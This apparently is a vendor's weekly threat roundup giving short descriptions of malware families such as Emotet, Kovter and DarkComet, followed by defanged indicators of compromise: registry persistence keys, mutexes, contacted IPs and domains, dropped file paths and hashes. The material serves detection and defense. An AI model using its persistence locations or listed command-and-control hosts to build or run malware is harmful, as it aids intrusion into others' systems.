Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Dropper.Kovter-6972554-0
Dropper
Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries which store its malicious code. Kovter is capable of reinfecting a system, even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware.
Win.Dropper.Swisyn-6973984-0
Dropper
This family is packed and has anti-analysis tricks to conceal its behavior. The binaries drop other executables that are executed and try to inject malicious code in the address space of other processes.
Win.Malware.DarkComet-6973063-1
Malware
DarkComet and related variants are a family of Remote Access Trojans designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system.
Win.Malware.Ursu-6977282-0
Malware
Ursu is a generic malware that has numerous functions. It contacts a C2 server and performs code injection in the address space of legitimate processes. It is able to achieve persistence and collect confidential data. It is spread via email.
Win.Malware.Zegost-6977492-1
Malware
Zegost, also known as Zusy, uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe". When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
Win.Packed.Shipup-6973041-0
Packed
This signature and IoCs cover the packed version of Shipup. These samples are packed and they gain persistence by creating a scheduled task to conduct their activities. Moreover, they inject malicious code in the address space of other processes and may hinder the analysis with anti-debugging and anti-vm checks.
Win.Ransomware.Razy-6972250-0
Ransomware
Razy is oftentimes a generic detection name for a Windows trojan. This malware typically collects sensitive information from the infected host, formats and encrypts the data, and sends it to a C2 server. In this case, the malware is functioning as ransomware, encrypting files with a .png, .txt, .html, or .mp3 file extension.
Win.Malware.AutoIT-6974564-1
Malware
This signature covers malware leveraging the well-known AutoIT automation tool, widely used by system administrators. AutoIT exposes a rich scripting language that allows to write fully functional malicious software. This family will install itself on the system and contact a C2 server to receive additional instructions or download follow-on payloads.

Threats

Doc.Downloader.Emotet-6971400-0

Indicators of Compromise

Registry Keys	Occurrences
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\sourcebulk`	2
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK Value Name: Type`	2
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK Value Name: Start`	2
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK Value Name: ErrorControl`	2
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK Value Name: ImagePath`	2
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK Value Name: DisplayName`	2
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK Value Name: WOW64`	2
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK Value Name: ObjectName`	2

Mutexes	Occurrences
`Global\I98B68E3C`	2
`Global\M98B68E3C`	2
`rrtlnsuwfk`	2

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
`191[.]92[.]69[.]115`	2
`90[.]57[.]69[.]215`	2
`37[.]9[.]175[.]14`	2
`107[.]6[.]16[.]60`	1
`209[.]237[.]134[.]156`	1
`123[.]125[.]50[.]138`	1
`12[.]6[.]148[.]4`	1
`172[.]217[.]6[.]211`	1
`91[.]93[.]119[.]93`	1
`203[.]199[.]83[.]4`	1
`18[.]209[.]113[.]128`	1
`104[.]244[.]42[.]195`	1
`204[.]52[.]196[.]123`	1
`67[.]195[.]197[.]75`	1
`96[.]118[.]242[.]233`	1
`195[.]186[.]227[.]53`	1
`17[.]56[.]136[.]171`	1
`107[.]152[.]26[.]215`	1
`137[.]118[.]27[.]84`	1
`199[.]180[.]198[.]140`	1
`216[.]117[.]4[.]25`	1
`75[.]177[.]169[.]225`	1
`78[.]188[.]7[.]213`	1
`207[.]44[.]45[.]27`	1
`115[.]71[.]233[.]127`	1
See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
`tomasoleksak[.]com`	2
`mail[.]amazon[.]com`	1
`smtp[.]amazon[.]de`	1
`SMTP[.]ANESA[.]MX`	1
`smtp[.]hotmail[.]es`	1
`MAIL[.]BYD[.]COM`	1
`mail[.]att[.]com`	1
`MAIL[.]TELMEX[.]COM`	1
`smtp[.]cronosc[.]mx`	1
`MAIL[.]AMAZON[.]FR`	1
`smtp[.]tgc[.]us[.]com`	1
`MAIL[.]SPROAJ[.]COM`	1
`MAIL[.]HOTMAIL[.]CA`	1
`MAIL[.]IKEA[.]GR`	1
`mail[.]neurologyauctoresonline[.]org`	1
`mail[.]dmforce01[.]de`	1
`mail[.]payment[.]visa4uk[.]fco[.]gov[.]uk`	1
`smtp[.]faithrv[.]com`	1
`mail[.]dullstroom[.]net`	1
`mail[.]infosync[.]ultipro[.]com`	1
`mail[.]worldofficeonline[.]com`	1
`SMTP[.]NKD[.]DE`	1
`smtp[.]login[.]aliexpress[.]com`	1
`SMTP[.]STCUSA[.]COM`	1
`mail[.]rijeca[.]com`	1
See JSON for more IOCs

Files and or directories created	Occurrences
`%HOMEPATH%\206.exe`	2

File Hashes

06e4174bff2f35981dfd45e4376499761584cf0e87bc310e510c21a42e6cfa31
09e81da7bfaa218857aa72793b86b2f3d3d4fd102e4282702bd524c45428833c
11051f782981a2d9804cb8a373dd9e30a9b7d8f328167de13873498ed7f98674
144b230733e25b20edabe39bad87913afed9279d4bde2f9b557d8a06c0cf53d7
1d174cf281f20a5f318e24b5df536ff2d04d6ea854a81d8d45a519cf3ca60ac2
1e9e79487ef3adba5aad25a1784a828f73112435d43581734998339f184ccfe8
1f33d167cd705d1e19f8b7fb8ed5ed1c08b89bff6738b0e0264174396aa6fc15
321a3f3b901c2f33206a7306778da305454dd0a4c35cad55f2082996958ff6ff
3257cfc9caf85ca8dafb76c69f6c2744b33cd46b7d9b119fdddd78694848d358
3299e6f7204ea1a44782d496c99329b76218b70233892426c02f872221548784
37a8f9312cbc6314a69d480c19287b0c41de1f346a301d0d9e07d95da178b94d
3ba1cad4f797c189510cbffa728b2b1b85ad1400d5ecbee223e262f03acf0443
400a5d6d21230c8fe91fed9cb2fa2ddae199cfa892462281452b106bd219a782
47413a4ab923acaf1bb2ac8eccfd9a1a66d282fa0b3731ddf2d062bcc2b58f70
4821d11f5f6c1d360fb783467ccf365e9e9d412b9d63e262004e592bf8083d03
4d9b585b5bb977301647ee51bffa8dc42b2f2ef1568a1693cada306de09d134d
5b4be5216d7eb192ca92a660ecb8fb86adae5da2727485141e9e9f02d6a24544
6665273fb05925bc755b1ee27eb962d49991f2d7926821ac019bb89a3384f745
6b455aa9464a18e44571793fb467505e6a50d5881bff86e79043fed5e9216d6c
706373653bea1bfd1d577a640e2942a16d064636f6a9aec85b58da3b0cb7ce2b
724c3189c486f06b9090c094256d1ff91fd4e235ccc39a0bd96dfd1b9e2e91e7
75f8716c14b028fee42ba751d4aae0ececdead291572bc36b8f9afeb1e71fb0b
78e448a30db3d7d86c655281ccecf72f12107d1cbd3c4c989103cf3401d65e9c
7ad693a3fd9da1b97c0e7f85fb37bf15f511168d2aa397ffcd4d0f3aeacc84db
7e88b184d97bee19296f2430cb932847db7c77f51d27561bbe88230a2417fff1
See JSON for more IOCs

Coverage

Screenshots of Detection

AMP

ThreatGrid

Malware

Win.Dropper.Kovter-6972554-0

Indicators of Compromise

Registry Keys	Occurrences
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE Value Name: DisableOSUpgrade`	25
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE Value Name: ReservationsAllowed`	25
`<HKLM>\SOFTWARE\WOW6432NODE\XVYG Value Name: xedvpa`	25
`<HKCU>\SOFTWARE\XVYG Value Name: xedvpa`	25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: ssishoff`	25
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WindowsUpdate`	25
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUpgrade`	25
`<HKCU>\SOFTWARE\xvyg`	25
`<HKLM>\SOFTWARE\WOW6432NODE\xvyg`	25
`<HKCR>\7b5078f`	25
`<HKCR>\7B5078F\shell`	25
`<HKCR>\7B5078F\SHELL\open`	25
`<HKCR>\7B5078F\SHELL\OPEN\command`	25
`<HKCR>\.16a05d4e`	25
`<HKCR>\.16A05D4E`	25
`<HKCR>\7B5078F\SHELL\OPEN\COMMAND`	25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101 Value Name: CheckSetting`	25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103 Value Name: CheckSetting`	25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100 Value Name: CheckSetting`	25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102 Value Name: CheckSetting`	25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104 Value Name: CheckSetting`	25
`<HKLM>\SOFTWARE\WOW6432NODE\XVYG Value Name: svdjlvs`	25

Mutexes	Occurrences
`EA4EC370D1E573DA`	25
`A83BAA13F950654C`	25
`Global\7A7146875A8CDE1E`	25
`B3E8F6F86CDD9D8B`	25
`\BaseNamedObjects\408D8D94EC4F66FC`	23
`\BaseNamedObjects\Global\350160F4882D1C98`	23
`\BaseNamedObjects\053C7D611BC8DF3A`	23

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
`76[.]178[.]30[.]160`	1
`104[.]206[.]242[.]181`	1
`102[.]163[.]142[.]253`	1
`30[.]225[.]184[.]221`	1
`124[.]252[.]58[.]53`	1
`101[.]97[.]177[.]118`	1
`191[.]246[.]151[.]160`	1
`196[.]95[.]102[.]96`	1
`112[.]165[.]89[.]87`	1
`76[.]194[.]40[.]50`	1
`223[.]86[.]178[.]79`	1
`68[.]130[.]198[.]26`	1
`130[.]62[.]249[.]13`	1
`21[.]192[.]27[.]192`	1
`81[.]122[.]170[.]69`	1
`159[.]33[.]113[.]193`	1
`158[.]223[.]237[.]32`	1
`121[.]154[.]29[.]121`	1
`53[.]124[.]76[.]212`	1
`39[.]77[.]6[.]39`	1
`61[.]16[.]172[.]165`	1
`174[.]223[.]23[.]225`	1
`223[.]163[.]24[.]62`	1
`31[.]41[.]82[.]151`	1
`181[.]83[.]42[.]248`	1
See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
`www[.]cloudflare[.]com`	1
`www[.]weibo[.]com`	1
`time[.]earleco[.]com`	1
`www[.]bvihouseasia[.]com[.]hk`	1
`www[.]bvi[.]org[.]uk`	1
`www[.]bvifsc[.]vg`	1
`www[.]bvitourism[.]com`	1
`bvifinance[.]vg`	1
`service[.]weibo[.]com`	1
`www[.]fiabvi[.]vg`	1
`www[.]vishipping[.]gov[.]vg`	1
`www[.]bvi[.]gov[.]vg`	1

Files and or directories created	Occurrences
`%LOCALAPPDATA%\39b0373`	25
`%LOCALAPPDATA%\39b0373\6a5cc64.16a05d4e`	25
`%LOCALAPPDATA%\39b0373\7cbdf29.bat`	25
`%APPDATA%\9d0423c`	25
`%LOCALAPPDATA%\39b0373\a0ed4db.lnk`	25
`%APPDATA%\9d0423c\da4e6c9.16a05d4e`	25
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\2ff4672.lnk`	25
`%HOMEPATH%\Local Settings\Application Data\25013c37\1ffa0202.41d68cee7`	23
`%HOMEPATH%\Local Settings\Application Data\25013c37\aae7a32b.bat`	23
`%APPDATA%\544d89dc\bf4dd39b.41d68cee7`	23
`%HOMEPATH%\Local Settings\Application Data\25013c37\5f60f76a.lnk`	23
`%HOMEPATH%\Start Menu\Programs\Startup\b24d2b96.lnk`	23
`\REGISTRY\MACHINE\SOFTWARE\Classes\exefile`	2
`%APPDATA%\95df7\dc6f5.28e5d9`	1
`%HOMEPATH%\Local Settings\Application Data\cf335\03b2a.lnk`	1
`%HOMEPATH%\Local Settings\Application Data\cf335\1a396.28e5d9`	1
`%HOMEPATH%\Local Settings\Application Data\cf335\7b80b.bat`	1
`%HOMEPATH%\Start Menu\Programs\Startup\1f9af.lnk`	1

File Hashes

0351e09f784933d3d59fe025b748e1d3fc01f545cf5dde505b034377794962c4
13d0ed2b542e6c09376adc96e9c4ef0e862727d24cbf39c6185cd8d9712c44bf
13da1a72b70ab0c78d9f1844fe5ad097e1235af32bea2f06935e32cce8e04d41
220e48a66788b6dadb06f6d326233b21694593b02140c8489dc951709a871bc1
23ae65200c6e2b11f1dfa4dc42355c2c161faa264cebe7fa62222f337a9e53f1
252de3df03b74bab9f82fe47cd809b5c3d9b86882b32a225c4abb3f9ddce955e
33d0abf301d6b4857c61e0f4d60b6a21c8ebe155731f3a737383f5f0fc055ad4
34a1ef0084d90a55ce19aa7bc0d17358247e6e3e9416b46291cb84e1b8414cef
35c9b57f3f5bffb0b1280901df5a8b4ab7fc76f453af1f72f336dad500648807
38011d4c3afaf9bb10fce05788089845a0d86edcc5424295ac3e0345d9795a59
39645016e9e74423955e24f235592ee22d48216873c6ad0abd67a57f87874af0
406a5b73c768d019808c2a779729b47d181fec402073f58ab07afc9630904198
43b3719228bb8b06e6981a2829b7920629ce1d3a650ccdf7813befe22616c3c0
57efc6fe6c36fcdac92f6210b006eac42f9ea53133f6df81a73bba822062e44d
5919b89bd4a14677da09b349d7aeeff86ba8fe690d30ce12bd55e69300393ef1
5e19b3dbc319fd8408280b4d886c9eeceffe7091151ef2b9cf5794840dd8a674
640878f3ea0254adcffe4ca564048ebe1a49a22b4821820d98a28c6f93529bc8
68f24fc9a20111bb749e1374fa1fcb832ca55f08f716561376c4aa7cc5cb60e4
6a67901c8232e4e4d9cbab3b161cd56a9c36596e92a0ad019537613f1c542ba5
6cb59a8f51d309a1b780e82c9f6e54274fdd10237dfb118fe75ce7c6d29941ec
7076e385d4b26ebaeff99786a8a5d76fedf122881d1ff29965993ee9f48bf584
730b4fade238d5afe3f535227dc729d4caf438312d6635cf65a6344ceb3888ee
74377fe4f81e47cb43780794543e5949342bb96adfb698aa80f9451a24e64b3b
7bbdad89f5b9aebe8c62048cbbc4b3f9521101ba9b25e100a3baeb24dfb1a499
7eed9a6117a9efce8a2717a695d9ccb697b0bcbd6cc85a01d530140070711945
See JSON for more IOCs

Coverage

Screenshots of Detection

AMP

Win.Dropper.Swisyn-6973984-0

Indicators of Compromise

Registry Keys	Occurrences
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: WINCHAT`	11

Mutexes	Occurrences
N/A	-

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
`210[.]241[.]123[.]205`	5
`61[.]60[.]12[.]164`	5
`64[.]76[.]147[.]89`	5
`190[.]85[.]16[.]13`	4
`187[.]45[.]228[.]58`	1

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
`economic[.]3cnet[.]tw`	4
`larry[.]yumiya[.]com`	1

Files and or directories created	Occurrences
`%APPDATA%\Help`	11
`ka4281x3.log`	11
`\TEMP\ka4281x3.log`	11
`%TEMP%\kb71271.log`	11
`%TEMP%\~$$workp.doc`	11
`%TEMP%\~$workp.doc`	11
`%APPDATA%\Help\WINCHAT.EXE`	11
`\ka4281x3.log`	10
`\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell`	2
`%TEMP%\CVRE02.tmp`	1
`%TEMP%\CVRFEB.tmp`	1
`%TEMP%\CVR6C7.tmp`	1
`%TEMP%\CVR725.tmp`	1
`%TEMP%\CVRC82.tmp`	1

File Hashes

007ca03c6d3185983f7628ce283087dca0d5bed03ec912200d1e921672303209
1baf10a1266410e3d9ea5010a86493f7a7c5cc8025fa1960e0fc3473827aaa23
3a6dd31a0a1382f74b13a1d1d4906c570302f858ac0c8c101865b3b6c7d448f8
53219b02a2c4231a996f9eebc53fd0a822e123efd47317789331822c02b3e3ab
56a652a5242989a2dfdc91a588180e939120a0b749e4cfb45b65a01399957143
602dc673518f70c3b55b8c0092435c40cdcec1725af015eae7a3ed869530c5cc
6b50e3860285f021a508a13dcd80c1325560ccdefbed642db3f607d3187ddebb
7722f295fa1cf7a3b5cda45aea62c1d4e7269bb964848a5cb6fe3098902b361d
a3683189e55067e50a65d37af97d8273ccacc87336ac4b7a2023032431f0cac2
a6991f1e575a92024a7dab7ab5e16f2c64a5caf59054ab326cb648ebdb7b1537
bc38eda2656f510bbeaf4dc14f25e97f249f5b3dc8327999ad44d2b4b98bd090

Coverage

Screenshots of Detection

AMP

ThreatGrid

Malware

Win.Malware.DarkComet-6973063-1

Indicators of Compromise

Registry Keys	Occurrences
`<HKLM>\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run`	14
`<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run`	14
`<HKCU>\SOFTWARE\CYBER Value Name: NewGroup`	7
`<HKCU>\SOFTWARE\CYBER Value Name: NewIdentification`	7
`<HKCU>\SOFTWARE\Cyber`	7
`<HKCU>\SOFTWARE\CYBER Value Name: FirstExecution`	7
`<HKLM>\Software\Wow6432Node\Microsoft\DownloadManager`	5
`<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{Q448C2M3-FYKV-7ID0-27GB-B0YJ02KV7B37}`	2
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: MicrosoftPrint`	2
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: MicrosoftPrint`	2
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{Q448C2M3-FYKV-7ID0-27GB-B0YJ02KV7B37} Value Name: StubPath`	2
`<HKCU>\SOFTWARE\cgtestor`	2
`<HKCU>\SOFTWARE\CGTESTOR Value Name: NewIdentification`	2
`<HKCU>\SOFTWARE\CGTESTOR Value Name: NewGroup`	2
`<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{A006786A-AF6Y-2H12-1ULT-6X56A8L375TN}`	1
`<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{H3T87034-72YI-HVWU-8TW1-XRLG3A51O2N1}`	1
`<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{XE2AOBQB-F345-88YC-GMXW-03PEJ75V7WN8}`	1
`<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{40UP52E3-1BA3-1FVA-0830-0LPA8BB74KCM}`	1
`<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{80MR36N0-3A0L-8U63-4ABE-DIG840AJ43R5}`	1
`<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{Y6OM0HT5-JGS2-L6NN-55A2-41O6554166B1}`	1
`<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{U24C12U8-JR64-860I-NR12-HX5Y3UL2O2GM}`	1
`<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{5CJXRF76-BP1U-TPUE-6DCM-I034DALUNKB4}`	1
`<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{L24VWK2P-22R2-46K2-V8RJ-XK2H03J01HJL}`	1
`<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{A8081X6Q-NN6X-B62A-4715-HN312RI8G7N5}`	1
`<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{7A1IWYJ7-F7XK-O3G5-N0V0-434M8W04DQ1K}`	1

Mutexes	Occurrences
`\BaseNamedObjects\Administrator5`	12
`\BaseNamedObjects\Administrator1`	12
`\BaseNamedObjects\Administrator4`	12
`{C20CD437-BA6D-4ebb-B190-70B43DE3B0F3}`	2
`2V1AWS6YF6TXG2`	2
`2V1AWS6YF6TXG2_PERSIST`	2
`2V1AWS6YF6TXG2_SAIR`	2
`8KRK5M71VU1M5K`	1
`8KRK5M71VU1M5K_PERSIST`	1
`2V80730O046N4E`	1
`2V80730O046N4E_PERSIST`	1
`2V80730O046N4E_SAIR`	1
`52736ID51F81S2`	1
`52736ID51F81S2_PERSIST`	1
`21J3T4M0224831`	1
`21J3T4M0224831_PERSIST`	1
`21J3T4M0224831_SAIR`	1
`Global\a76de881-7963-11e9-a007-00501e3ae7b5`	1
`Global\a54a6c41-7963-11e9-a007-00501e3ae7b5`	1
`7IJA3Q405R67XA`	1
`7IJA3Q405R67XA_PERSIST`	1
`7IJA3Q405R67XA_SAIR`	1
`BAND78GIQB66CP`	1
`BAND78GIQB66CP_PERSIST`	1
`BAND78GIQB66CP_SAIR`	1
See JSON for more IOCs

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
`52[.]8[.]126[.]80`	3
`162[.]125[.]8[.]6`	2

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
`www[.]server[.]com`	3
`dl[.]dropbox[.]com`	2
`amphetamin[.]dyndns[.]org`	2
`bll3bll3[.]no-ip[.]biz`	2
`chugychugy[.]no-ip[.]biz`	1
`thecool[.]zapto[.]org`	1
`danyeltdc[.]no-ip[.]biz`	1
`cybergateratmortal[.]no-ip[.]biz`	1
`mark1[.]dyndns[.]info`	1
`NKG[.]NO-IP[.]BIZ`	1
`tomate12345[.]zapto[.]org`	1
`freecoolstuff[.]dyndns[.]org`	1

Files and or directories created	Occurrences
`%TEMP%\Administrator2.txt`	15
`%TEMP%\Administrator7`	15
`%TEMP%\Administrator8`	15
`%APPDATA%\Administratorlog.dat`	15
`%TEMP%`	14
`%SystemRoot%\SysWOW64\WinDir`	3
`%SystemRoot%\SysWOW64\WinDir\Svchost.exe`	2
`\directory`	2
`\directory\CyberGate\install\server.exe`	2
`\directory\CyberGate`	2
`\directory\CyberGate\install`	2
`%SystemRoot%\SysWOW64\Windefend`	2
`%APPDATA%\Windefend`	2
`%APPDATA%\Windefend\wdlc.exe`	2
`%SystemRoot%\SysWOW64\Windefend\wdlc.exe`	2
`%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\sqlite3[1].htm`	2
`%SystemRoot%\SysWOW64\Java`	2
`%SystemRoot%\SysWOW64\Java\Java.exe`	2
`%SystemRoot%\svchost.exe`	1
`%SystemRoot%\install\server.exe`	1
`%SystemRoot%\SysWOW64\Svchost\Svchost.exe`	1
`%TEMP%\fKbeeL8LAf7RNJz277.exe`	1
`%TEMP%\wNXued4pQq1zObh0H1.exe`	1
`%TEMP%\WqtgkF7HZR2P6A.exe`	1
`%TEMP%\yORdpf8sEy7.exe`	1
See JSON for more IOCs

File Hashes

042cc2f502cc7a8830f1422060bc7087218516dde6da1b82f13fce5dfb7fefc9
09de6f1c248817500b6dd911e7cca1f662e4d4cc8f4ade8b9ede3af558553074
15573121831d3e2c67bf219bbcd4e78c65e20d92f00bc16f2dbe564b02add7ce
3041bd2d8b516685011bc96d42f6b0c5814790e51a7935a9b9a4f0e3d35b87f4
33b215de55923f27998929217024c409e0b9059ae5f970aaeae6e8436185f615
3708fb9505564ee292d27082f43ff080fe3545e5d9bdab204ac2b0e26825d4e9
3a396d00735cb58475f7dfc44748a8b8b797157aa7c0ddbe73386434ad33382d
98db7f273a141813f60c82b113635f0cbf0ec5e25ac58e518c629790a6536882
9bffcee38ba555a0a522c3f18ac96fcb44b0a692007271fd239e8437756d379f
a192abef36bafcd1e7bad8620fc08a1618b285fcbec6a097521b0a99102d05c8
b64e1524cc098319cfd34d594e48b1ddad7690c9bb2e5a273e518fdf7b09ace2
c458867497286338031748ea86a7accb00bc03bd879cbcbf9102f5b4dcd9f360
f79c376b416bcfac45152f1b2a9809b12a1e7ee3afb50a0ccd4c1799b51735d3
fe712cd1343925500766a1bcff4c5221838998cf8dee475f0e84e9aa476a6583
fe9e3a928bdf85a0013f677b77acd177b7ae3a366cab7717a1871c537250b062

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Malware.Ursu-6977282-0

Indicators of Compromise

Registry Keys	Occurrences
`<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\TOOLBAR Value Name: Locked`	23
`<HKCU>\SOFTWARE\VB and VBA Program Settings`	23
`<HKCU>\Software\VB and VBA Program Settings\Explorer\Process`	23
`<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\Explorer`	23
`<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\EXPLORER\PROCESS Value Name: LO`	23
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: Explorer`	23
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: Svchost`	23
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED Value Name: ShowSuperHidden`	23
`<HKLM>\SYSTEM\CurrentControlSet\Services\Schedule`	23
`<HKLM>\SYSTEM\CurrentControlSet\Services\SharedAccess`	23
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SCHEDULE Value Name: Start`	23
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS Value Name: Start`	23
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE Value Name: Explorer`	23
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE Value Name: Svchost`	23

Mutexes	Occurrences
N/A	-

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
N/A	-

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
N/A	-

Files and or directories created	Occurrences
`%SystemRoot%\Resources\Themes\explorer.exe`	25
`%SystemRoot%\Resources\spoolsv.exe`	25
`%SystemRoot%\Resources\svchost.exe`	25
`\atsvc`	23
`%System32%\Tasks\svchost`	23
`%SystemRoot%\Resources\Themes\tjcm.cmn`	23
`%System32%\drivers\oreans32.sys`	23
`%System32%\en-US\imageres.dll.mui`	2
`%SystemRoot%\Globalization\Sorting\sortdefault.nls`	1
`\??\NTICE`	1

File Hashes

2e95794cf4894836b24b8d63f7d01139135e15d5fd812551265155d3ec0a36e2
373b6d81957c30c8b5cb4d5ff66511d9e0b308e3457023421ccc693bb60859ca
39c6009a9f65fc0bd39f8e610783084e7611be480522e76d928e3e29b8b85a55
3ab8dbe50d5b2a8d5e7643d59c0e2572fa4ee06dcebccbe633e996ce215d2fd0
43ce287dab8e1471defe0f40f07c13fe4bf03ce03353b11fff3b2f2f1b5998a3
47f97a745fd206df983cb63192aa2ad0cfe6f0a2ccbc2652bdcd83bf9c7bb707
630e3a845a2099c100dd766f92a51100338a22c50849f00a805a05f3049ec844
665b3e6eff2cc67b7c609af33521b00c93482612de5963f6924a6a68f2d07da2
690259339ab8cec23f2461593a3620d910b6f76ff22e38ed7143472cd4ca667d
6ca1e0caa0c5e634a66b3e1d3204cb93fc5806a8313a05d45a480c4903a7fde9
6ccc81bec3a9344b374d9a62f297ac9811912b8d4f2fa887d5beb7fe7a16c116
77a7bffcedc1638995971267e62a7e3f0b900ed7af4a98c7b831b4bf7c99d6d9
7a636b56140c6b1ff69aa713d4db994b8be893f9009faea048016b92103c2310
7c9dbb9c3ac7dd94bcc79e828596516e66b4348e0f8bd581fea660d5da0f7d68
83a1152f36ce9eda3546517d4a2e96eb183f613870aae71b330a73b8d3f774db
885bfa45c4c0dc4de65e777d4230ef3ba11a6d39f6785b9a7f4f231e37b9efca
89ffe264e5d751253570f51215234cccb4daa74e01a4556611851db821c1b505
8e31825cd4844cf15c4e69b3cd0e8daa410a6ece67324f26d65764934507b6d8
8ff2a0391fac1832f423e1c0b156291751a81f3be34f31b9e77e39eb215c8acc
9412fd31320ffb831d69a4a7db2317d17d6ed91f246b52d1fd0ff9dfd0ec9da8
96f43911f3a315a34c2a29886d6b3bab6bacfa867bf3bdf85766c546f5e49ed1
ae352a71d00f328be74de101fe0a9ee2b08ba6a30b233c44505efd45c5af113c
b058353182c961e81209f09203f59da326fca6c7397c2d05ecdde7018c6191cd
b1db9ddfd0492846007e6ce13f295a463293bd45f36012d576aa9285830950ee
bd977100e6206d546c7b90be267bf8e6d6005327014a671c58fa44b8b104e91d
See JSON for more IOCs

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Malware.Zegost-6977492-1

Indicators of Compromise

Registry Keys	Occurrences
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: XXXXXX579E5A5B VVVVVVrr2unw==`	24

Mutexes	Occurrences
`AAAAAA9PT0vfT4rqenp70A/Pqpp6+vr58= BBBBBB9PT0vf4Fr7K0sr0A/Pqpp6+vr58= CCCCCC9PT0vQXpr7K0sr0A/Pqpp6+vr58= GGGGGG4wIF/vL7858= XXXXXX579E5A5B VVVVVVrr2unw==`	24
